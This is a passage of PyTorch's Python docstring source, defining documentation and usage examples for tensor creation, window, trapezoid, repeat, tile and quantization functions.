""".format(**factory_common_args))
add_docstr(torch.zeros_like,
r"""
zeros_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor filled with the scalar value `0`, with the same size as
:attr:`input`. ``torch.zeros_like(input)`` is equivalent to
``torch.zeros(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
.. warning::
As of 0.4, this function does not support an :attr:`out` keyword. As an alternative,
the old ``torch.zeros_like(input, out=output)`` is equivalent to
``torch.zeros(input.size(), out=output)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
Example::
>>> input = torch.empty(2, 3)
>>> torch.zeros_like(input)
tensor([[ 0., 0., 0.],
[ 0., 0., 0.]])
""".format(**factory_like_common_args))
add_docstr(torch.empty,
"""
empty(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False, pin_memory=False, \
memory_format=torch.contiguous_format) -> Tensor
Returns a tensor filled with uninitialized data. The shape of the tensor is
defined by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{out}
{dtype}
{layout}
{device}
{requires_grad}
{pin_memory}
{memory_format}
Example::
>>> torch.empty((2,3), dtype=torch.int64)
tensor([[ 9.4064e+13, 2.8000e+01, 9.3493e+13],
[ 7.5751e+18, 7.1428e+18, 7.5955e+18]])
""".format(**factory_common_args))
add_docstr(torch.empty_like,
r"""
empty_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns an uninitialized tensor with the same size as :attr:`input`.
``torch.empty_like(input)`` is equivalent to
``torch.empty(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
Example::
>>> a=torch.empty((2,3), dtype=torch.int32, device = 'cuda')
>>> torch.empty_like(a)
tensor([[0, 0, 0],
[0, 0, 0]], device='cuda:0', dtype=torch.int32)
""".format(**factory_like_common_args))
add_docstr(torch.empty_strided,
r"""
empty_strided(size, stride, *, dtype=None, layout=None, device=None, requires_grad=False, pin_memory=False) -> Tensor
Creates a tensor with the specified :attr:`size` and :attr:`stride` and filled with undefined data.
.. warning::
If the constructed tensor is "overlapped" (with multiple indices referring to the same element
in memory) its behavior is undefined.
Args:
size (tuple of ints): the shape of the output tensor
stride (tuple of ints): the strides of the output tensor
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{pin_memory}
Example::
>>> a = torch.empty_strided((2, 3), (1, 2))
>>> a
tensor([[8.9683e-44, 4.4842e-44, 5.1239e+07],
[0.0000e+00, 0.0000e+00, 3.0705e-41]])
>>> a.stride()
(1, 2)
>>> a.size()
torch.Size([2, 3])
""".format(**factory_common_args))
add_docstr(torch.full, r"""
full(size, fill_value, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Creates a tensor of size :attr:`size` filled with :attr:`fill_value`. The
tensor's dtype is inferred from :attr:`fill_value`.
Args:
size (int...): a list, tuple, or :class:`torch.Size` of integers defining the
shape of the output tensor.
fill_value (Scalar): the value to fill the output tensor with.
Keyword args:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.full((2, 3), 3.141592)
tensor([[ 3.1416, 3.1416, 3.1416],
[ 3.1416, 3.1416, 3.1416]])
""".format(**factory_common_args))
add_docstr(torch.full_like,
"""
full_like(input, fill_value, \\*, dtype=None, layout=torch.strided, device=None, requires_grad=False, \
memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same size as :attr:`input` filled with :attr:`fill_value`.
``torch.full_like(input, fill_value)`` is equivalent to
``torch.full(input.size(), fill_value, dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
fill_value: the number to fill the output tensor with.
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
""".format(**factory_like_common_args))
add_docstr(torch.det, r"""
det(input) -> Tensor
Alias for :func:`torch.linalg.det`
""")
add_docstr(torch.where,
r"""
where(condition, x, y) -> Tensor
Return a tensor of elements selected from either :attr:`x` or :attr:`y`, depending on :attr:`condition`.
The operation is defined as:
.. math::
\text{out}_i = \begin{cases}
\text{x}_i & \text{if } \text{condition}_i \\
\text{y}_i & \text{otherwise} \\
\end{cases}
.. note::
The tensors :attr:`condition`, :attr:`x`, :attr:`y` must be :ref:`broadcastable <broadcasting-semantics>`.
.. note::
Currently valid scalar and tensor combination are
1. Scalar of floating dtype and torch.double
2. Scalar of integral dtype and torch.long
3. Scalar of complex dtype and torch.complex128
Arguments:
condition (BoolTensor): When True (nonzero), yield x, otherwise yield y
x (Tensor or Scalar): value (if :attr:`x` is a scalar) or values selected at indices
where :attr:`condition` is ``True``
y (Tensor or Scalar): value (if :attr:`y` is a scalar) or values selected at indices
where :attr:`condition` is ``False``
Returns:
Tensor: A tensor of shape equal to the broadcasted shape of :attr:`condition`, :attr:`x`, :attr:`y`
Example::
>>> x = torch.randn(3, 2)
>>> y = torch.ones(3, 2)
>>> x
tensor([[-0.4620, 0.3139],
[ 0.3898, -0.7197],
[ 0.0478, -0.1657]])
>>> torch.where(x > 0, x, y)
tensor([[ 1.0000, 0.3139],
[ 0.3898, 1.0000],
[ 0.0478, 1.0000]])
>>> x = torch.randn(2, 2, dtype=torch.double)
>>> x
tensor([[ 1.0779, 0.0383],
[-0.8785, -1.1089]], dtype=torch.float64)
>>> torch.where(x > 0, x, 0.)
tensor([[1.0779, 0.0383],
[0.0000, 0.0000]], dtype=torch.float64)
.. function:: where(condition) -> tuple of LongTensor
:noindex:
``torch.where(condition)`` is identical to
``torch.nonzero(condition, as_tuple=True)``.
.. note::
See also :func:`torch.nonzero`.
""")
add_docstr(torch.logdet,
r"""
logdet(input) -> Tensor
Calculates log determinant of a square matrix or batches of square matrices.
.. note::
Result is ``-inf`` if :attr:`input` has zero log determinant, and is ``nan`` if
:attr:`input` has negative determinant.
.. note::
Backward through :meth:`logdet` internally uses SVD results when :attr:`input`
is not invertible. In this case, double backward through :meth:`logdet` will
be unstable in when :attr:`input` doesn't have distinct singular values. See
:meth:`~torch.svd` for details.
Arguments:
input (Tensor): the input tensor of size ``(*, n, n)`` where ``*`` is zero or more
batch dimensions.
Example::
>>> A = torch.randn(3, 3)
>>> torch.det(A)
tensor(0.2611)
>>> torch.logdet(A)
tensor(-1.3430)
>>> A
tensor([[[ 0.9254, -0.6213],
[-0.5787, 1.6843]],
[[ 0.3242, -0.9665],
[ 0.4539, -0.0887]],
[[ 1.1336, -0.4025],
[-0.7089, 0.9032]]])
>>> A.det()
tensor([1.1990, 0.4099, 0.7386])
>>> A.det().log()
tensor([ 0.1815, -0.8917, -0.3031])
""")
add_docstr(torch.slogdet, r"""
slogdet(input) -> (Tensor, Tensor)
Alias for :func:`torch.linalg.slogdet`
""")
add_docstr(torch.pinverse, r"""
pinverse(input, rcond=1e-15) -> Tensor
Alias for :func:`torch.linalg.pinv`
""")
add_docstr(torch.hann_window,
"""
hann_window(window_length, periodic=True, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Hann window function.
.. math::
w[n] = \frac{1}{2}\ \left[1 - \cos \left( \frac{2 \pi n}{N - 1} \right)\right] =
\sin^2 \left( \frac{\pi n}{N - 1} \right),
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.hann_window(L, periodic=True)`` equal to
``torch.hann_window(L + 1, periodic=False)[:-1])``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.hamming_window,
"""
hamming_window(window_length, periodic=True, alpha=0.54, beta=0.46, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Hamming window function.
.. math::
w[n] = \alpha - \beta\ \cos \left( \frac{2 \pi n}{N - 1} \right),
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.hamming_window(L, periodic=True)`` equal to
``torch.hamming_window(L + 1, periodic=False)[:-1])``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
.. note::
This is a generalized version of :meth:`torch.hann_window`.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
alpha (float, optional): The coefficient :math:`\alpha` in the equation above
beta (float, optional): The coefficient :math:`\beta` in the equation above
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.bartlett_window,
"""
bartlett_window(window_length, periodic=True, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Bartlett window function.
.. math::
w[n] = 1 - \left| \frac{2n}{N-1} - 1 \right| = \begin{cases}
\frac{2n}{N - 1} & \text{if } 0 \leq n \leq \frac{N - 1}{2} \\
2 - \frac{2n}{N - 1} & \text{if } \frac{N - 1}{2} < n < N \\
\end{cases},
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.bartlett_window(L, periodic=True)`` equal to
``torch.bartlett_window(L + 1, periodic=False)[:-1])``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.blackman_window,
"""
blackman_window(window_length, periodic=True, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Blackman window function.
.. math::
w[n] = 0.42 - 0.5 \cos \left( \frac{2 \pi n}{N - 1} \right) + 0.08 \cos \left( \frac{4 \pi n}{N - 1} \right)
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.blackman_window(L, periodic=True)`` equal to
``torch.blackman_window(L + 1, periodic=False)[:-1])``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.kaiser_window, """
kaiser_window(window_length, periodic=True, beta=12.0, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Computes the Kaiser window with window length :attr:`window_length` and shape parameter :attr:`beta`.
Let I_0 be the zeroth order modified Bessel function of the first kind (see :func:`torch.i0`) and
``N = L - 1`` if :attr:`periodic` is False and ``L`` if :attr:`periodic` is True,
where ``L`` is the :attr:`window_length`. This function computes:
.. math::
out_i = I_0 \left( \beta \sqrt{1 - \left( {\frac{i - N/2}{N/2}} \right) ^2 } \right) / I_0( \beta )
Calling ``torch.kaiser_window(L, B, periodic=True)`` is equivalent to calling
``torch.kaiser_window(L + 1, B, periodic=False)[:-1])``.
The :attr:`periodic` argument is intended as a helpful shorthand
to produce a periodic window as input to functions like :func:`torch.stft`.
.. note::
If :attr:`window_length` is one, then the returned window is a single element tensor containing a one.
""" + r"""
Args:
window_length (int): length of the window.
periodic (bool, optional): If True, returns a periodic window suitable for use in spectral analysis.
If False, returns a symmetric window suitable for use in filter design.
beta (float, optional): shape parameter for the window.
Keyword args:
{dtype}
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
""".format(**factory_common_args))
add_docstr(torch.vander,
"""
vander(x, N=None, increasing=False) -> Tensor
""" + r"""
Generates a Vandermonde matrix.
The columns of the output matrix are elementwise powers of the input vector :math:`x^{{(N-1)}}, x^{{(N-2)}}, ..., x^0`.
If increasing is True, the order of the columns is reversed :math:`x^0, x^1, ..., x^{{(N-1)}}`. Such a
matrix with a geometric progression in each row is named for Alexandre-Theophile Vandermonde.
Arguments:
x (Tensor): 1-D input tensor.
N (int, optional): Number of columns in the output. If N is not specified,
a square array is returned :math:`(N = len(x))`.
increasing (bool, optional): Order of the powers of the columns. If True,
the powers increase from left to right, if False (the default) they are reversed.
Returns:
Tensor: Vandermonde matrix. If increasing is False, the first column is :math:`x^{{(N-1)}}`,
the second :math:`x^{{(N-2)}}` and so forth. If increasing is True, the columns
are :math:`x^0, x^1, ..., x^{{(N-1)}}`.
Example::
>>> x = torch.tensor([1, 2, 3, 5])
>>> torch.vander(x)
tensor([[ 1, 1, 1, 1],
[ 8, 4, 2, 1],
[ 27, 9, 3, 1],
[125, 25, 5, 1]])
>>> torch.vander(x, N=3)
tensor([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> torch.vander(x, N=3, increasing=True)
tensor([[ 1, 1, 1],
[ 1, 2, 4],
[ 1, 3, 9],
[ 1, 5, 25]])
""".format(**factory_common_args))
add_docstr(torch.unbind,
r"""
unbind(input, dim=0) -> seq
Removes a tensor dimension.
Returns a tuple of all slices along a given dimension, already without it.
Arguments:
input (Tensor): the tensor to unbind
dim (int): dimension to remove
Example::
>>> torch.unbind(torch.tensor([[1, 2, 3],
>>> [4, 5, 6],
>>> [7, 8, 9]]))
(tensor([1, 2, 3]), tensor([4, 5, 6]), tensor([7, 8, 9]))
""")
add_docstr(torch.combinations,
r"""
combinations(input, r=2, with_replacement=False) -> seq
Compute combinations of length :math:`r` of the given tensor. The behavior is similar to
python's `itertools.combinations` when `with_replacement` is set to `False`, and
`itertools.combinations_with_replacement` when `with_replacement` is set to `True`.
Arguments:
input (Tensor): 1D vector.
r (int, optional): number of elements to combine
with_replacement (boolean, optional): whether to allow duplication in combination
Returns:
Tensor: A tensor equivalent to converting all the input tensors into lists, do
`itertools.combinations` or `itertools.combinations_with_replacement` on these
lists, and finally convert the resulting list into tensor.
Example::
>>> a = [1, 2, 3]
>>> list(itertools.combinations(a, r=2))
[(1, 2), (1, 3), (2, 3)]
>>> list(itertools.combinations(a, r=3))
[(1, 2, 3)]
>>> list(itertools.combinations_with_replacement(a, r=2))
[(1, 1), (1, 2), (1, 3), (2, 2), (2, 3), (3, 3)]
>>> tensor_a = torch.tensor(a)
>>> torch.combinations(tensor_a)
tensor([[1, 2],
[1, 3],
[2, 3]])
>>> torch.combinations(tensor_a, r=3)
tensor([[1, 2, 3]])
>>> torch.combinations(tensor_a, with_replacement=True)
tensor([[1, 1],
[1, 2],
[1, 3],
[2, 2],
[2, 3],
[3, 3]])
""")
add_docstr(torch.trapezoid,
r"""
trapezoid(y, x=None, *, dx=None, dim=-1) -> Tensor
Computes the `trapezoidal rule <https://en.wikipedia.org/wiki/Trapezoidal_rule>`_ along
:attr:`dim`. By default the spacing between elements is assumed to be 1, but
:attr:`dx` can be used to specify a different constant spacing, and :attr:`x` can be
used to specify arbitrary spacing along :attr:`dim`.
Assuming :attr:`y` is a one-dimensional tensor with elements :math:`{y_0, y_1, ..., y_n}`,
the default computation is
.. math::
\begin{aligned}
\sum_{i = 1}^{n-1} \frac{1}{2} (y_i + y_{i-1})
\end{aligned}
When :attr:`dx` is specified the computation becomes
.. math::
\begin{aligned}
\sum_{i = 1}^{n-1} \frac{\Delta x}{2} (y_i + y_{i-1})
\end{aligned}
effectively multiplying the result by :attr:`dx`. When :attr:`x` is specified,
assuming :attr:`x` is also a one-dimensional tensor with
elements :math:`{x_0, x_1, ..., x_n}`, the computation becomes
.. math::
\begin{aligned}
\sum_{i = 1}^{n-1} \frac{(x_i - x_{i-1})}{2} (y_i + y_{i-1})
\end{aligned}
When :attr:`x` and :attr:`y` have the same size, the computation is as described above and no broadcasting is needed.
The broadcasting behavior of this function is as follows when their sizes are different. For both :attr:`x`
and :attr:`y`, the function computes the difference between consecutive elements along
dimension :attr:`dim`. This effectively creates two tensors, `x_diff` and `y_diff`, that have
the same shape as the original tensors except their lengths along the dimension :attr:`dim` is reduced by 1.
After that, those two tensors are broadcast together to compute final output as part of the trapezoidal rule.
See the examples below for details.
.. note::
The trapezoidal rule is a technique for approximating the definite integral of a function
by averaging its left and right Riemann sums. The approximation becomes more accurate as
the resolution of the partition increases.
Arguments:
y (Tensor): Values to use when computing the trapezoidal rule.
x (Tensor): If specified, defines spacing between values as specified above.
Keyword arguments:
dx (float): constant spacing between values. If neither :attr:`x` or :attr:`dx`
are specified then this defaults to 1. Effectively multiplies the result by its value.
dim (int): The dimension along which to compute the trapezoidal rule.
The last (inner-most) dimension by default.
Examples::
>>> # Computes the trapezoidal rule in 1D, spacing is implicitly 1
>>> y = torch.tensor([1, 5, 10])
>>> torch.trapezoid(y)
tensor(10.5)
>>> # Computes the same trapezoidal rule directly to verify
>>> (1 + 10 + 10) / 2
10.5
>>> # Computes the trapezoidal rule in 1D with constant spacing of 2
>>> # NOTE: the result is the same as before, but multiplied by 2
>>> torch.trapezoid(y, dx=2)
21.0
>>> # Computes the trapezoidal rule in 1D with arbitrary spacing
>>> x = torch.tensor([1, 3, 6])
>>> torch.trapezoid(y, x)
28.5
>>> # Computes the same trapezoidal rule directly to verify
>>> ((3 - 1) * (1 + 5) + (6 - 3) * (5 + 10)) / 2
28.5
>>> # Computes the trapezoidal rule for each row of a 3x3 matrix
>>> y = torch.arange(9).reshape(3, 3)
tensor([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> torch.trapezoid(y)
tensor([ 2., 8., 14.])
>>> # Computes the trapezoidal rule for each column of the matrix
>>> torch.trapezoid(y, dim=0)
tensor([ 6., 8., 10.])
>>> # Computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with the same arbitrary spacing
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([1, 3, 6])
>>> torch.trapezoid(y, x)
array([5., 5., 5.])
>>> # Computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with different arbitrary spacing per row
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([[1, 2, 3], [1, 3, 5], [1, 4, 7]])
>>> torch.trapezoid(y, x)
array([2., 4., 6.])
""")
add_docstr(torch.trapz,
r"""
trapz(y, x, *, dim=-1) -> Tensor
Alias for :func:`torch.trapezoid`.
""")
add_docstr(torch.cumulative_trapezoid,
r"""
cumulative_trapezoid(y, x=None, *, dx=None, dim=-1) -> Tensor
Cumulatively computes the `trapezoidal rule <https://en.wikipedia.org/wiki/Trapezoidal_rule>`_
along :attr:`dim`. By default the spacing between elements is assumed to be 1, but
:attr:`dx` can be used to specify a different constant spacing, and :attr:`x` can be
used to specify arbitrary spacing along :attr:`dim`.
For more details, please read :func:`torch.trapezoid`. The difference between :func:`torch.trapezoid`
and this function is that, :func:`torch.trapezoid` returns a value for each integration,
where as this function returns a cumulative value for every spacing within the integration. This
is analogous to how `.sum` returns a value and `.cumsum` returns a cumulative sum.
Arguments:
y (Tensor): Values to use when computing the trapezoidal rule.
x (Tensor): If specified, defines spacing between values as specified above.
Keyword arguments:
dx (float): constant spacing between values. If neither :attr:`x` or :attr:`dx`
are specified then this defaults to 1. Effectively multiplies the result by its value.
dim (int): The dimension along which to compute the trapezoidal rule.
The last (inner-most) dimension by default.
Examples::
>>> # Cumulatively computes the trapezoidal rule in 1D, spacing is implicitly 1.
>>> y = torch.tensor([1, 5, 10])
>>> torch.cumulative_trapezoid(y)
tensor([3., 10.5])
>>> # Computes the same trapezoidal rule directly up to each element to verify
>>> (1 + 5) / 2
3.0
>>> (1 + 10 + 10) / 2
10.5
>>> # Cumulatively computes the trapezoidal rule in 1D with constant spacing of 2
>>> # NOTE: the result is the same as before, but multiplied by 2
>>> torch.cumulative_trapezoid(y, dx=2)
tensor([6., 21.])
>>> # Cumulatively computes the trapezoidal rule in 1D with arbitrary spacing
>>> x = torch.tensor([1, 3, 6])
>>> torch.cumulative_trapezoid(y, x)
tensor([6., 28.5])
>>> # Computes the same trapezoidal rule directly up to each element to verify
>>> ((3 - 1) * (1 + 5)) / 2
6.0
>>> ((3 - 1) * (1 + 5) + (6 - 3) * (5 + 10)) / 2
28.5
>>> # Cumulatively computes the trapezoidal rule for each row of a 3x3 matrix
>>> y = torch.arange(9).reshape(3, 3)
tensor([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> torch.cumulative_trapezoid(y)
tensor([[ 0.5, 2.],
[ 3.5, 8.],
[ 6.5, 14.]])
>>> # Cumulatively computes the trapezoidal rule for each column of the matrix
>>> torch.cumulative_trapezoid(y, dim=0)
tensor([[ 1.5, 2.5, 3.5],
[ 6.0, 8.0, 10.0]])
>>> # Cumulatively computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with the same arbitrary spacing
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([1, 3, 6])
>>> torch.cumulative_trapezoid(y, x)
tensor([[2., 5.],
[2., 5.],
[2., 5.]])
>>> # Cumulatively computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with different arbitrary spacing per row
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([[1, 2, 3], [1, 3, 5], [1, 4, 7]])
>>> torch.cumulative_trapezoid(y, x)
tensor([[1., 2.],
[2., 4.],
[3., 6.]])
""")
add_docstr(torch.repeat_interleave,
r"""
repeat_interleave(input, repeats, dim=None, *, output_size=None) -> Tensor
Repeat elements of a tensor.
.. warning::
This is different from :meth:`torch.Tensor.repeat` but similar to ``numpy.repeat``.
Args:
{input}
repeats (Tensor or int): The number of repetitions for each element.
repeats is broadcasted to fit the shape of the given axis.
dim (int, optional): The dimension along which to repeat values.
By default, use the flattened input array, and return a flat output
array.
Keyword args:
output_size (int, optional): Total output size for the given axis
( e.g. sum of repeats). If given, it will avoid stream syncronization
needed to calculate output shape of the tensor.
Returns:
Tensor: Repeated tensor which has the same shape as input, except along the given axis.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> x.repeat_interleave(2)
tensor([1, 1, 2, 2, 3, 3])
>>> y = torch.tensor([[1, 2], [3, 4]])
>>> torch.repeat_interleave(y, 2)
tensor([1, 1, 2, 2, 3, 3, 4, 4])
>>> torch.repeat_interleave(y, 3, dim=1)
tensor([[1, 1, 1, 2, 2, 2],
[3, 3, 3, 4, 4, 4]])
>>> torch.repeat_interleave(y, torch.tensor([1, 2]), dim=0)
tensor([[1, 2],
[3, 4],
[3, 4]])
>>> torch.repeat_interleave(y, torch.tensor([1, 2]), dim=0, output_size=3)
tensor([[1, 2],
[3, 4],
[3, 4]])
.. function:: repeat_interleave(repeats, *, output_size=None) -> Tensor
:noindex:
If the `repeats` is `tensor([n1, n2, n3, ...])`, then the output will be
`tensor([0, 0, ..., 1, 1, ..., 2, 2, ..., ...])` where `0` appears `n1` times,
`1` appears `n2` times, `2` appears `n3` times, etc.
""".format(**common_args))
add_docstr(torch.tile, r"""
tile(input, dims) -> Tensor
Constructs a tensor by repeating the elements of :attr:`input`.
The :attr:`dims` argument specifies the number of repetitions
in each dimension.
If :attr:`dims` specifies fewer dimensions than :attr:`input` has, then
ones are prepended to :attr:`dims` until all dimensions are specified.
For example, if :attr:`input` has shape (8, 6, 4, 2) and :attr:`dims`
is (2, 2), then :attr:`dims` is treated as (1, 1, 2, 2).
Analogously, if :attr:`input` has fewer dimensions than :attr:`dims`
specifies, then :attr:`input` is treated as if it were unsqueezed at
dimension zero until it has as many dimensions as :attr:`dims` specifies.
For example, if :attr:`input` has shape (4, 2) and :attr:`dims`
is (3, 3, 2, 2), then :attr:`input` is treated as if it had the
shape (1, 1, 4, 2).
.. note::
This function is similar to NumPy's tile function.
Args:
input (Tensor): the tensor whose elements to repeat.
dims (tuple): the number of repetitions per dimension.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> x.tile((2,))
tensor([1, 2, 3, 1, 2, 3])
>>> y = torch.tensor([[1, 2], [3, 4]])
>>> torch.tile(y, (2, 2))
tensor([[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4]])
""")
add_docstr(torch.quantize_per_tensor,
r"""
quantize_per_tensor(input, scale, zero_point, dtype) -> Tensor
Converts a float tensor to a quantized tensor with given scale and zero point.
Arguments:
input (Tensor): float tensor or list of tensors to quantize
scale (float or Tensor): scale to apply in quantization formula
zero_point (int or Tensor): offset in integer value that maps to float zero
dtype (:class:`torch.dtype`): the desired data type of returned tensor.
Has to be one of the quantized dtypes: ``torch.quint8``, ``torch.qint8``, ``torch.qint32``
Returns:
Tensor: A newly quantized tensor or list of quantized tensors.
Example::
>>> torch.quantize_per_tensor(torch.tensor([-1.0, 0.0, 1.0, 2.0]), 0.1, 10, torch.quint8)
tensor([-1., 0., 1., 2.], size=(4,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.1, zero_point=10)
>>> torch.quantize_per_tensor(torch.tensor([-1.0, 0.0, 1.0, 2.0]), 0.1, 10, torch.quint8).int_repr()
tensor([ 0, 10, 20, 30], dtype=torch.uint8)
>>> torch.quantize_per_tensor([torch.tensor([-1.0, 0.0]), torch.tensor([-2.0, 2.0])],
>>> torch.tensor([0.1, 0.2]), torch.tensor([10, 20]), torch.quint8)
(tensor([-1., 0.], size=(2,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.1, zero_point=10),
tensor([-2., 2.], size=(2,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.2, zero_point=20))
>>> torch.quantize_per_tensor(torch.tensor([-1.0, 0.0, 1.0, 2.0]), torch.tensor(0.1), torch.tensor(10), torch.quint8)
tensor([-1., 0., 1., 2.], size=(4,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.10, zero_point=10)
""")
add_docstr(torch.quantize_per_channel,
r"""
quantize_per_channel(input, scales, zero_points, axis, dtype) -> Tensor
Converts a float tensor to a per-channel quantized tensor with given scales and zero points.
Arguments:
input (Tensor): float tensor to quantize
scales (Tensor): float 1D tensor of scales to use, size should match ``input.size(axis)``
zero_points (int): integer 1D tensor of offset to use, size should match ``input.size(axis)``
axis (int): dimension on which apply per-channel quantization
dtype (:class:`torch.dtype`): the desired data type of returned tensor.
Has to be one of the quantized dtypes: ``torch.quint8``, ``torch.qint8``, ``torch.qint32``
Returns:
Tensor: A newly quantized tensor
Example::
>>> x = torch.tensor([[-1.0, 0.0], [1.0, 2.0]])
>>> torch.quantize_per_channel(x, torch.tensor([0.1, 0.01]), torch.tensor([10, 0]), 0, torch.quint8)
tensor([[-1., 0.],
[ 1., 2.]], size=(2, 2), dtype=torch.quint8,
quantization_scheme=torch.per_channel_affine,
scale=tensor([0.1000, 0.0100], dtype=torch.float64),
zero_point=tensor([10, 0]), axis=0)
>>> torch.quantize_per_channel(x, torch.tensor([0.1, 0.01]), torch.tensor([10, 0]), 0, torch.quint8).int_repr()
tensor([[ 0, 10],
[100, 200]], dtype=torch.uint8)
""")
add_docstr(torch.quantized_batch_norm,
r"""
quantized_batch_norm(input, weight=None, bias=None, mean, var, eps, output_scale, output_zero_point) -> Tensor
Applies batch normalization on a 4D (NCHW) quantized tensor.
.. math::
y = \frac{x - \mathrm{E}[x]}{\sqrt{\mathrm{Var}[x] + \epsilon}} * \gamma + \beta
Arguments:
input (Tensor): quantized tensor
weight (Tensor): float tensor that corresponds to the gamma, size C
bias (Tensor): float tensor that corresponds to the beta, size C
mean (Tensor): float mean value in batch normalization, size C
var (Tensor): float tensor for variance, size C
eps (float): a value added to the denominator for numerical stability.
output_scale (float): output quantized tensor scale
output_zero_point (int): output quantized tensor zero_point
Returns:
Tensor: A quantized tensor with batch normalization applied.
Example::
>>> qx = torch.quantize_per_tensor(torch.rand(2, 2, 2, 2), 1.5, 3, torch.quint8)
>>> torch.quantized_batch_norm(qx, torch.ones(2), torch.zeros(2), torch.rand(2), torch.rand(2), 0.00001, 0.2, 2)
